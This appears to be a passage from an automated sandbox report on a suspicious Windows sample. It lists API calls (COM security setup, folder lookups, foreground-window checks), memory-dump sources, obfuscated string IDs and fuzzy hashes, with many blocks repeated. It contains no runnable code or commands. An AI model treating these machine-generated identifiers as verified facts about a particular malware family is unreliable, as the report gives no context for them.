• CoSetProxyBlanket.OLE32(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 004364A7
• SysAllocString.OLEAUT32(w!s#), ref: 004364FB
• SysAllocString.OLEAUT32(A3q5), ref: 004365A1
• VariantInit.OLEAUT32(?), ref: 00436613
• VariantClear.OLEAUT32(?), ref: 00436775
• SysFreeString.OLEAUT32(?), ref: 004367A0
• SysFreeString.OLEAUT32(?), ref: 004367A6
• SysFreeString.OLEAUT32(00000000), ref: 004367B3
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: String$AllocFree$Variant$BlanketClearCreateInitInstanceProxy
                                                                                                                                                                                                                                                                                      • String ID: A;$BC$C$T'g)$X&c8$Y/9Q$w!s#$z7}9A3q5
                                                                                                                                                                                                                                                                                      • API String ID: 2485776651-4124187736
                                                                                                                                                                                                                                                                                      • Opcode ID: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                                      • Instruction ID: 522da010f1620deffab12e26d595bfb80e0736a5a48a815d81ab8756012ad252
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1a7a540a913549243f643d940beb1ec8542d667b59db154e60dd983501a017ec
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7112EC72A083019BD314CF28C881B6BBBE5FFC9304F15992DF595DB290D778D9058B9A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                                      • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction ID: f89536dd89445c36d0748b7bd4a9cf4b738649ea5c65e76590e6169531de8307
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C43242B0611B569FDB48CF26D580389BBB1FF45300F548698C9695FB4ADB35A8A2CFC0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: 4%$>V$>V$<>$EG$IK$UW$|~
                                                                                                                                                                                                                                                                                      • API String ID: 0-2246970021
                                                                                                                                                                                                                                                                                      • Opcode ID: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction ID: 5b83408054e6837627d94385e11371328adee73dbb80cf533ed7779431d45b03
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cc1dde96a411e1e6fcd6a59f7ef47bdc2781b26c4dfcad69bf9094ee8fc7f5bd
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 713243B4601B469FDB48CF2AD580389BBB1FF45300F648698C9595FB5ADB35A892CFC0
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: *mB$67$@iB$V3R5
                                                                                                                                                                                                                                                                                      • API String ID: 0-119712241
                                                                                                                                                                                                                                                                                      • Opcode ID: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                                      • Instruction ID: f8f986030c5c516667fa2fb6bcf2798bb7f33b75dff4277953ef0512ab11a316
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2752cfb5aefe83a77e1e275bbb3611267d68b1f03f1cd38cb6bb80b62f128883
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6A2258716083548BC728DF68E85176FB7E1EFC5304F49893DE9868B392EB349905CB86
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &'$0c=e$2g1i$<k;m$B$wy
                                                                                                                                                                                                                                                                                      • API String ID: 0-2430453506
                                                                                                                                                                                                                                                                                      • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction ID: efc43d6a55d29c5113b9513135886848320c4b4fba7a0b6b3d57c2edb9ba0087
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26D127B56083118BD724DF25D85276BB7F2EFE2314F58992CE4828B3A5F7789801CB46
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction ID: f15181a2a9622c2e50c414abf7a3ac4626398852fa6a8a653e4f6d86baaa0204
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 62B1087020C3918AE324CF2994917BFBBD2AFD6304F588A6ED4D987391DB788449C757
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$0$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-3264166258
                                                                                                                                                                                                                                                                                      • Opcode ID: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction ID: c178f22928673b026a7e7e8de46b4cab487007225332062ee64903f1244e28dc
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6f787935f52e1d9f41ee2cdf27def6dc2193743486b37ecbc705986605444a77
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 89B1F87510C3818AE368CF29C4907BBBBD2AFD2314F288A6ED4DD8B391DB758549C716
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 024A8A1B
                                                                                                                                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 024A8A25
                                                                                                                                                                                                                                                                                      • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 024A8AC2
                                                                                                                                                                                                                                                                                      • GetForegroundWindow.USER32 ref: 024A8AD7
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 024A8BD9
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                      • API String ID: 4063528623-0
                                                                                                                                                                                                                                                                                      • Opcode ID: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                      • Instruction ID: c58823c02a31885ec6d39e16bdf74a65671f2f475a6676f7002b2bded0c6724e
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7b623bcc5e135466e494fc7f4101763bd35fdd0b5e674fc8217798d0a0a97a45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9E416B77F4431807D71CAEA58CA93AAB6969BC4314F0A803F6986AB390DE795C0656C1
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: )*$X9{;$r1B
                                                                                                                                                                                                                                                                                      • API String ID: 0-1001561910
                                                                                                                                                                                                                                                                                      • Opcode ID: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                                      • Instruction ID: a1479a56b64214e2a7fc54a03e2bd96b94a4879ed58cb61811aa9170273c6ab6
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8dd660af85e9b30ff04e02c10e609101b9a09426abdb28fd85c75e4d1b9bc82c
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 94D1BAB06083419FD3009F59E88166BBBE0FF96309F54892DF5818B351E3B8DA09CB5A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: -$C\$Iz$[^$de
                                                                                                                                                                                                                                                                                      • API String ID: 0-3020956940
                                                                                                                                                                                                                                                                                      • Opcode ID: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                                      • Instruction ID: e1ce7c89e45d16bcd91c54bb6943d2a9f79ffbc50f6667256eaf7ee8aaf95e0a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f819af1d85e380cc0a90eb61a19dfdbbe2cdd3936953633e8d3f19afdb44e2e0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C012237654C3108FC314CFA8C8926ABBBE2EFD5314F18892DE4E58B391E7789505CB86
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &'$0c=e$2g1i$<k;m$wy
                                                                                                                                                                                                                                                                                      • API String ID: 0-3335612808
                                                                                                                                                                                                                                                                                      • Opcode ID: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction ID: a8bfb4297b9c75ca0f9219c6d5a2933cbf01f4fa7e00436f7aa57a517ea8efac
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eb1d602c92fd99bd83cb42d187dbb3c1cba3f1d687f489207edda56632bda968
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7BD118B5608301CBD728DF29C85176BB7F2EF92318F18996DD4828B394F7799501CB52
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: &=$5$D@6T$EF$zJyL
                                                                                                                                                                                                                                                                                      • API String ID: 0-923305466
                                                                                                                                                                                                                                                                                      • Opcode ID: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                      • Instruction ID: a1ece66a1846d5f05b18afa13e78785737907ef84dba56bd06699bfcf49e878d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f99561a0788cee97c829df764e2ebd4c7b90c8b56b0bfd503a4f7d65a1aead45
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16A1097120C3918AE364CF2994917AFBBD2AFD2304F588A6ED4C987391DB788449C757
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &=$5$D@6T$EF$zJyL
• API String ID: 0-923305466
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: in~x$kmbj$ydij$Z\
• API String ID: 0-979945983
Strings
Memory Dump Source
• Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &-$)R_X$[O_[$zusR
• API String ID: 0-3432275560
Strings
Memory Dump Source
• Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
Yara matches
Similarity
• API ID:
• String ID: &-$)R_X$[O_[$zusR
• API String ID: 0-3432275560
                                                                                                                                                                                                                                                                                      • Opcode ID: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                                      • Instruction ID: 3faa7a69bb4ac4e76d5cc59992b34319cc73639cba000e64a611e9e2fb346017
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c72d066a0ba9d98f0ff19214e9d8c23779a55738a99cb06a59f657220fc0cf28
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D42F6706083908FC726DF28C8507EFBBE1AFD6214F48866EE8E55B392D7359505CB62
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                      • Instruction ID: 01141288c62049998ddddb8392f03a48052843576c41680a3c86522b868e0cab
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b5f0696b81a42aa6f60329296e76e493f1753759ee01a5998428369545935cda
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 17E1076121C3918BE725CF29D4517BBBBD6EFD2304F58896EC0D987392DB38840AC796
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                                      • Instruction ID: e9c3c3fc0ba363620b01016382a173f9f7f5ce786023cd46b78fdff8f6b5be05
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f133d09027ec2c5d3c2aef6507ecce0520632deac5b770a07f28f5cb5c76ebf0
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33E1F77511D3C18BE765CF29C4517BBBBD6EF92208F28896EC0D987392DB39810AC712
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                                      • Instruction ID: 105acce5f4ff7ea6d47210ba8b73cab4478fbe416d66b6a3adf1b721c409ed6c
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 85136c1757dee14467642a6d6da49c775a03d8ccdff6c4bcf62a10f86f43ba84
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16E1F37120C3D18AE735CF2594607BBBBD6EFD2304F5848AEC1C98B292DB39440ACB56
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: %(#}$/$/26-$1
                                                                                                                                                                                                                                                                                      • API String ID: 0-261129489
                                                                                                                                                                                                                                                                                      • Opcode ID: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                                      • Instruction ID: 0c51cd5d7074d907fcce2674e61627e9c038189c1a09bec547b06ac12bf0703d
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 47b00d7d64a94561f5ec20e782c8b23bde4d21acf7bd80337db5547180c095d9
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 28E1C87551D3C18AE775CF29C4517BBBBD6EFD2208F28486EC1C987292DB39414ACB12
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                                                      • String ID: "w+y$?TUV$D@YO$^QRW
                                                                                                                                                                                                                                                                                      • API String ID: 0-2418547040
                                                                                                                                                                                                                                                                                      • Opcode ID: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                                      • Instruction ID: fcb942591893e55783a104e15fa10a8e25e40a6012ded37723e5c7bd10029470
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b33f7a74249a1930603a4104fb56ed047204ad8f914d8738a10807f3eb918719
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3502AB75600701CFD324CF29C891BA2B7F2FF59314F19896DD4968BBA1DB39A841CB44
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1759814633.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000003.00000002.1759814633.0000000000452000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_86DC.jbxd
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000003.00000002.1760386518.00000000024A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024A0000, based on PE: false
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_24a0000_86DC.jbxd
                                                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Uninitialize
                                                                                                                                                                                                                                                                                      • String ID: PT
                                                                                                                                                                                                                                                                                      • API String ID: 3861434553-4135314810
